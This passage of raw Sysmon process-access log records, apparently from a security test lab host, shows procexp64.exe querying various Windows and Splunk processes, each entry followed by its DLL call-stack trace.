32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERN